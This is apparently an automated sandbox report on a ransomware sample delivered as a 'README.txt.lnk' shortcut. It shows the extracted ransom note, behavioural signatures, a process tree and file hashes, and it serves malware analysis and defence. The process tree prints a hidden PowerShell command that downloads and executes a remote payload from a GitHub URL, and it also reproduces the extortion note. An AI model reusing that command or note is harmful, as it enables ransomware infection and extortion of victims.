Analysis

  • max time kernel
    93s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    26-01-2025 14:51

General

  • Target

    README.txt.lnk

  • Size

    1KB

  • MD5

    e1cff745a65a199bdf9dfebe3f69e3f7

  • SHA1

    8c77e01ceb0ff774a66afa5b7a32b0735e422e9e

  • SHA256

    3b497ec4d80770a5172a72f871528397fde8ea5969aa2c3cde98edb0a6946355

  • SHA512

    7e9204f24290dfdff14200945a31b7d3421122f3fb526845a8250e4325751af5fac226057becf1d0d381f021cca6aae7f6fe0b2d2b517c3441006423de03496c

Malware Config

Extracted

Path

C:\RlWCfyLxZ.README.txt

Ransom Note
========================================
!!! ATTENTION !!!
Your Files Have Been Encrypted by ManiaCrypt
========================================

What Happened?
--------------
All of your important files, documents, photos, and databases have been encrypted using RSA.
Without our decryption program, your files cannot be restored.

Why Trust Us:
--------------------
If we dont give you the decryption program after payment, nobody will trust us.

What You Need to Do:
--------------------
To get the decryption program, you must contact us.

Steps to Restore Your Files:
----------------------------
1. Open Discord and add the username ballets4.
2. Send us a message and mention your situation.
3. We will provide further instructions for obtaining the decryption program.

Important Information:
-----------------------
- DO NOT attempt to recover your files using third-party tools. They may damage your data and make recovery impossible.
- DO NOT rename, move, or modify the encrypted files. This will also make decryption impossible.
- Only we have the tools required to decrypt your files safely and effectively.

We are waiting for your message. Time is critical.

========================================
Your Files. Your Responsibility.
========================================

Signatures

  • Lockbit

    Ransomware family with multiple variants released since late 2019.

  • Lockbit family
  • Rule to detect Lockbit 3.0 ransomware Windows payload 1 IoCs
  • Renames multiple (622) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops desktop.ini file(s) 2 IoCs
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 4 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies Control Panel 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\README.txt.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1680
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start notepad.exe & powershell.exe -w h -nop -c "iex(irm 'https://raw.githubusercontent.com/BalletsPistol/d9fb74g8db7d8b7db48df7g8db77f4drb7er8db7fd84d7b1gdb47d8b7brt18bcy87gdfb8hfg74h87fh8bf18h7/main/rev.b64')"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3404
      • C:\Windows\system32\notepad.exe
        notepad.exe
        3⤵
        PID:4848
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -w h -nop -c "iex(irm 'https://raw.githubusercontent.com/BalletsPistol/d9fb74g8db7d8b7db48df7g8db77f4drb7er8db7fd84d7b1gdb47d8b7brt18bcy87gdfb8hfg74h87fh8bf18h7/main/rev.b64')"
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4180
          • C:\Users\Admin\91qsdf.exe
            "C:\Users\Admin\91qsdf.exe"
            4⤵
            • Executes dropped EXE
            • Drops desktop.ini file(s)
            • Sets desktop wallpaper using registry
            • System Location Discovery: System Language Discovery
            • Modifies Control Panel
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4216
            • C:\Windows\splwow64.exe
              C:\Windows\splwow64.exe 12288
              5⤵
              • Drops file in System32 directory
              PID:2968
            • C:\ProgramData\1C7D.tmp
              "C:\ProgramData\1C7D.tmp"
              5⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:4776
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C DEL /F /Q C:\PROGRA~3\1C7D.tmp >> NUL
                6⤵
                • System Location Discovery: System Language Discovery
                PID:5328
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
      1⤵
      PID:1052
      • C:\Windows\system32\printfilterpipelinesvc.exe
        C:\Windows\system32\printfilterpipelinesvc.exe -Embedding
        1⤵
        • Drops file in System32 directory
        • Suspicious use of WriteProcessMemory
        PID:3276
        • C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
          /insertdoc "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\{B15A1A52-B363-41E5-A429-9F2CA36B325E}.xps" 133823766926380000
          2⤵
          • Checks processor information in registry
          • Enumerates system info in registry
          • Suspicious use of SetWindowsHookEx
          PID:4772

Network

MITRE ATT&CK Enterprise v15
Downloads

  • C:\$Recycle.Bin\S-1-5-21-3442511616-637977696-3186306149-1000\BBBBBBBBBBB
    Filesize: 129B
    MD5: d6854f9029fe1b67033d5b3a54233b9c
    SHA1: 91a36a05a2c7d84e8579227f415d6a153ee6c0dc
    SHA256: 778875b8b8305b0de0eaee60d2c7809204409b059a67ab137f40ca5a43a56219
    SHA512: 98bb0130367b9e29655958d9fe05d36cb957378943e80a50cd1fae6aa42653d5a528134f56326dadb45c08f9ebd25f5497fc5c6893a84c8ab5cac463f6eb7b96

  • C:\ProgramData\1C7D.tmp
    Filesize: 14KB
    MD5: 294e9f64cb1642dd89229fff0592856b
    SHA1: 97b148c27f3da29ba7b18d6aee8a0db9102f47c9
    SHA256: 917e115cc403e29b4388e0d175cbfac3e7e40ca1742299fbdb353847db2de7c2
    SHA512: b87d531890bf1577b9b4af41dddb2cdbbfa164cf197bd5987df3a3075983645a3acba443e289b7bfd338422978a104f55298fbfe346872de0895bde44adc89cf

  • C:\RlWCfyLxZ.README.txt
    Filesize: 1KB
    MD5: c283c63ae856a725b5e4f127156e4cf6
    SHA1: d8d9b6f436f2495f52eb248f05998835fc71738d
    SHA256: 9bcbb2fc5d4124bce953bda76499c9a1ddf81a7befb06dd1c0294bedd3c9ba4b
    SHA512: 3a07269c7de4a3ce862aa8f15014bab2f39497c1be0359fd34b2ecb4f417dd9cdcb43c249d7f80563d2facedaece9741310f5e8cd452e15c508e02098be9d0e2

  • C:\Users\Admin\91qsdf.exe
    Filesize: 147KB
    MD5: 5e0b0af4c133567f05fe4efd9b6936e5
    SHA1: 5469f3b48217924741c024cd2f8fb8f808502654
    SHA256: bd66fb04d8359196cb918f81f48a662830928dfd3218dfe0cc2418e21615f5a5
    SHA512: 9ccb59ee9688deef4fef9d329337299e126f40cc904acdea288e7b96d72a9c9546b8da2a175aeeefe7547e6167898de5df97f8a123b9189da94d86e4ffb421fa

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eisjz4u2.q4t.ps1
    Filesize: 60B
    MD5: d17fe0a3f47be24a6453e9ef58c94641
    SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\{D9C9254A-B37C-4C79-8CEC-0421E03C60B8}
    Filesize: 4KB
    MD5: 2c32a0bdb0c9912003da683302755c49
    SHA1: 2b660019bae13f6cf56e56c1f44200ed1d8ff46f
    SHA256: af6d9975e1444622451cb8a6aefd97569fd8614357496e5a92c6dc30714c282f
    SHA512: 7400756d5e4366e42a2b1b27d03215386933cea28ed809525bd2a360265255830534e97edd1732f9fdae37726127366a46dbd2af50cf8fca2db03b5d77d65445

  • C:\Users\Admin\DDDDDDDDDD
    Filesize: 147KB
    MD5: 8fcacfe98be79907b9dc770eda96d3b4
    SHA1: 7e6a7430479d95a7afc5d417b170fb277b5e321e
    SHA256: d476dacfa4d784f5cdd02819cdd264c714a6d00aa19a9ea54424c42fbd499a00
    SHA512: 78b165385367c395ca8970dba234188ca06ab7bd43ae406b6399ea6a501da3226aa18b4b27579ab5f3721de86254a39804bc2b14e3d94e299353849176b84432

  • C:\Users\Admin\Documents\OneNote Notebooks\My Notebook\Open Notebook.onetoc2
    Filesize: 4KB
    MD5: b1d876707020cc449327f8160b75293c
    SHA1: 9f8a00f5fa1d829ee46526732102a9d03855d9eb
    SHA256: 88a382d7cfefd7e1dd83b62240269da62be9c52b92e2c4f0746bb26a0baeb6b2
    SHA512: 931cdd0f21408da51e4508e49668a23f1a83bff1ba8609c66f98926a2e405b91230d2b336b42868b152cfdc71dc184de16fa9578b71c451f13b72da611798886

  • F:\$RECYCLE.BIN\S-1-5-21-3442511616-637977696-3186306149-1000\DDDDDDDDDDD
    Filesize: 129B
    MD5: ec686952cd0aa5dbb6e1abb19a20ff3f
    SHA1: 139507d38142ec3720f5efd1b268802ac1161d45
    SHA256: 3296fb96faae79866ba4a4f6fde278ce19d54d38ec81e90e0a5107822fafc1bd
    SHA512: 90cc4df3e189ea8f2251cbc2ff18251103ea64f369da7acddd5fffa14bc85bed105e4954efff6d3a7aa3c4bec7883d57b08f18940cea24539fe6223c277f001b

  • memory/4180-13-0x000002A67C950000-0x000002A67CB12000-memory.dmp
    Filesize: 1.8MB

  • memory/4180-0-0x00007FFA5E943000-0x00007FFA5E945000-memory.dmp
    Filesize: 8KB

  • memory/4180-1-0x000002A663820000-0x000002A663842000-memory.dmp
    Filesize: 136KB

  • memory/4180-22-0x00007FFA5E940000-0x00007FFA5F401000-memory.dmp
    Filesize: 10.8MB

  • memory/4180-11-0x00007FFA5E940000-0x00007FFA5F401000-memory.dmp
    Filesize: 10.8MB

  • memory/4180-12-0x00007FFA5E940000-0x00007FFA5F401000-memory.dmp
    Filesize: 10.8MB

  • memory/4772-3043-0x00007FFA3C9B0000-0x00007FFA3C9C0000-memory.dmp
    Filesize: 64KB

  • memory/4772-3044-0x00007FFA3C9B0000-0x00007FFA3C9C0000-memory.dmp
    Filesize: 64KB

  • memory/4772-3048-0x00007FFA3C9B0000-0x00007FFA3C9C0000-memory.dmp
    Filesize: 64KB

  • memory/4772-3078-0x00007FFA3A950000-0x00007FFA3A960000-memory.dmp
    Filesize: 64KB

  • memory/4772-3079-0x00007FFA3A950000-0x00007FFA3A960000-memory.dmp
    Filesize: 64KB

  • memory/4772-3047-0x00007FFA3C9B0000-0x00007FFA3C9C0000-memory.dmp
    Filesize: 64KB

  • memory/4772-3042-0x00007FFA3C9B0000-0x00007FFA3C9C0000-memory.dmp
    Filesize: 64KB